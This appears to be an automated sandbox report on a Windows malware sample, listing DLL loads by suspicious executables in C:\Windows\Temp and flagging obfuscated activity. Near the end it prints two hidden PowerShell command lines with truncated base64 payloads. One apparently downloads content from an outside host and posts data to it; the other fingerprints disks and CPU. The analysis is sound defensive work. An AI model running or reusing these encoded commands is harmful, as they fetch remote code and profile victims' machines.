Source: C:\Windows\Temp\svczHost.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Temp\svczHost.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Temp\svczHost.exe	Section loaded: ntmarta.dll
Source: C:\Windows\Temp\svczHost.exe	Section loaded: winnsi.dll
Source: C:\Windows\Temp\svczHost.exe	Section loaded: sspicli.dll
Source: C:\Windows\Temp\svczHost.exe	Section loaded: schannel.dll
Source: C:\Windows\Temp\svczHost.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\Temp\svczHost.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\Temp\svczHost.exe	Section loaded: msasn1.dll
Source: C:\Windows\Temp\svczHost.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edgegdi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edgegdi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: samlib.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll
Source: C:\Windows\System32\net.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\net.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\net.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\net.exe	Section loaded: samcli.dll
Source: C:\Windows\System32\net.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\net.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\net1.exe	Section loaded: samcli.dll
Source: C:\Windows\System32\net1.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\net1.exe	Section loaded: dsrole.dll
Source: C:\Windows\System32\net1.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\net1.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\net1.exe	Section loaded: logoncli.dll
Source: C:\Windows\System32\net1.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: apphelp.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: ncrypt.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: version.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: ntasn1.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: edgegdi.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: icu.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: ntmarta.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: winhttp.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: mswsock.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: wshunix.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: dnsapi.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: winrnr.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: nlaapi.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: wshbth.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: devobj.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: pnrpnsp.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: napinsp.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: wtsapi32.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: winsta.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: userenv.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: profapi.dll
Source: C:\Windows\Temp\myRdpService.exe	Section loaded: sspicli.dll
Source: C:\Windows\regedit.exe	Section loaded: authz.dll
Source: C:\Windows\regedit.exe	Section loaded: aclui.dll
Source: C:\Windows\regedit.exe	Section loaded: ulib.dll
Source: C:\Windows\regedit.exe	Section loaded: clb.dll
Source: C:\Windows\regedit.exe	Section loaded: uxtheme.dll
Source: C:\Windows\regedit.exe	Section loaded: ntdsapi.dll
Source: C:\Windows\regedit.exe	Section loaded: xmllite.dll
Source: C:\Windows\regedit.exe	Section loaded: edgegdi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edgegdi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: edgegdi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: esscli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edgegdi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edgegdi.dll

Source: C:\Windows\System32\systeminfo.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\System32\systeminfo.exe "C:\Windows\system32\systeminfo.exe"

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source:	Binary string: .pdbpdbtem.pdbD source: powershell.exe, 00000009.00000002.4154450229.000001BD75AF7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ?\C:\Windows\dll\mscorlib.pdb source: powershell.exe, 00000005.00000002.3074920696.0000015B6D4E2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: b.pdb- source: powershell.exe, 00000009.00000002.4154450229.000001BD75AF7000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Anti Malware Scan Interface: FromBase64String("WmxibVJsY2lJZ2ZRMEtEUW9qSUVOb1pXTnJJR2xtSUdGdWVTQnZkR2hsY2lCaGJuUnBkbWx5ZFhNZ2MyOW1kSGRoY21VZ2FYTWdhVzV6ZEdGc2JHVmtEUW9rYjNSb1pYSkJiblJwZG1seWRYTWdQU0JIWlhRdFYyMXBUMkpxWldOMElDMU9ZVz

Suspicious powershell command line found

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwBrAGkAbgBnAHMAbQBhAGsAZQByAC4AYwBhAC8AZgBpAGwAZQAyAC8AOQBhAGUAYQA4AGIAZgA4ADMAMwBjADgANwA3ADAAOQA1ADkAZABiADcAYwA3ADIAOABmADQAYwBjAGQAYwBmAGMAOABmADQAZQA5ADMAMABhAGYANABkAGQANAA0AGUANgA1ADIAMQAzAGIAOQBiADQAYQA0ADcAOABlADUAZgA4ADYAZABjADEAMQA5AGEAMAA4ADEAMAAxADkANABhADkAMAA4ADcANAA0ADAAYgA3ADkAMAAzADgAMgBlAGIANwAxADEANQBhADkAZAA2AGEAMwAzAGIAYwAwADIAMAAyADgAZQA1ADUANgA3ADgAYQBiAGUAMAAyAGEAZAA0ADUAZAA0ADgAZQA5AGEAZgBhADkAMwBhAGYAOAAzADcANQAzADEAZQAzADUAYgAxAGMAOAA4AGUANgBiAGYAYwBhAGYAYQAyADcAZAA4ADIAZQBlADIANAA0ADIAMAAzAGIAOAA2AGEANgA1ADAAYQBjAGYAMwAzADQANgAwADYANwA2AGUAMQA5AGUANABkADUAMABjAGMAYgBmADcAYgA3ADkANQA1ADcANQBiADQAOAAxAGUAYwA0AGQANAAzACIAOwANAAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADAAOwANAAoADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAAUwBlAG4AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACgAIABbAFAAUwBPAGIAagBlAGMAdABdACAAJABsAG8AZwBNAHMAZwAgACkADQAKAA0ACgAgACAAIAAgACMAIABDAG8AbgB2AGUAcgB0ACAAYgBvAGQAeQAgAHQAbwAgAHMAdAByAGkAbgBnAA0ACgAgACAAIAAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQAgAD0AIABbAHMAdAByAGkAbgBnAF0AKAAkAGwAbwBnAE0AcwBnACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgApADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAA9ACAAQAAoACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgACsAPQAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAIgAtAC0ALQAtAC0ALQAtAC0ALQAtACIAOwANAAoADQAKACAAIAAgACAAJABoAGUAYQBkAGUAcgBzACAAPQAgAEAAewB9ADsADQAKACAAIAAgACAAJABrAGUAeQAgAD0AIAAiAEMAbwBuAHQAZQBuAHQALQBUAHkAcABlACIAOwANAAoAIAAgACAAIAAkAHYAYQBsAHUAZQAgAD0AIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAGoAcwBvAG4AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAWwAkAGsAZQB5AF0AIAA9ACAAJAB2AGEAbAB1AGUAOwANAAoAIAAgACAAIAAkAHUAcgBpACAAPQAgACIATABPAEcAVQBSAEwAIgA7AA0ACgAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAG8AZAB5ACAAPQAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBIAGUAYQBkAGUAcgBzACAAJABoAGUAYQBkAGUAcgBzACAALQBCAG8AZAB5ACAAJABiAG8AZAB5AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAGMAYQB0AGMAaAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAADQAKAH0ADQAKAA0ACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAA0ACgB7AA0ACgAJAA0ACgAJAHQAcgB5AHsADQAKACAAIAAgACAAIAAgACAAIABTAGUAbgBkACAAIgBiAGUAZwBpAG4AIABkAG8AdwBuAGwAbwBhAGQAIAAkAHUAcgBpACIAOwANAAoACQAJACQAYwBvAG4AdABlAG4AdAAgAD0AIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwANAAoAIAAgACAAIAAgACAAIAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJABjAG8AbgB0AGUAbgB0AC4AYwBvAG4AdABlAG4AdAA7AA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAIAAoACQAaQAgAD0AIAAwADsAIAAkAG
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZgB1AG4AYwB0AGkAbwBuACAARwBlAHQALQBJAGQAZQBuAHQAaQB0AHkAewAKACAAIAAgACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIAAtAEMAbABhAHMAcwAgAFcAaQBuADMAMgBfAEQAaQBzAGsARAByAGkAdgBlACAAfAAgAFcAaABlAHIAZQAtAE8AYgBqAGUAYwB0ACAAewAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACIAIAAtAG8AcgAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACAALQAgAFMAUwBEACIAIAB9AAoAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAA9ACAAQAAoACkACgBmAG8AcgBlAGEAYwBoACAAKAAkAGgAYQByAGQARAByAGkAdgBlACAAaQBuACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACkAIAB7AAoAIAAgACAAIAAkAHMAZQByAGkAYQBsAE4AdQBtAGIAZQByACAAPQAgACQAaABhAHIAZABEAHIAaQB2AGUALgBTAGUAcgBpAGEAbABOAHUAbQBiAGUAcgAKACAAIAAgACAAJABtAG8AZABlAGwAIAA9ACAAJABoAGEAcgBkAEQAcgBpAHYAZQAuAE0AbwBkAGUAbAAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwAgAD0AIAAiAFMAZQByAGkAYQBsACAATgB1AG0AYgBlAHIAOgAgACQAcwBlAHIAaQBhAGwATgB1AG0AYgBlAHIALAAgAE0AbwBkAGUAbAA6ACAAJABtAG8AZABlAGwAIgAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAArAD0AIAAkAGQAcgBpAHYAZQBJAG4AZgBvAAoAfQAKACQAYwBvAG0AYgBpAG4AZQBkAEkAbgBmAG8AIAA9ACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAAtAGoAbwBpAG4AIAAiAGAAcgBgAG4AIgAKACQAYwBwAHUASQBuAGYAbwAgAD0AIABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMAIABXAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzAG8AcgAKACQAYwBwAHUARABlAHQAYQBpAGwAcwAgAD0AIAAiAFAAcgBvAGMAZQBzAHMAbwByAEkAZAA6ACAAJAAoACQAYwBwAHUASQBuAGYAbwAuAFAAcgBvAGMAZQBzAHMAbwByAEkAZAApACwAIABOAGEAbQBlADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATgBhAG0AZQApACwAIABNAGEAeABD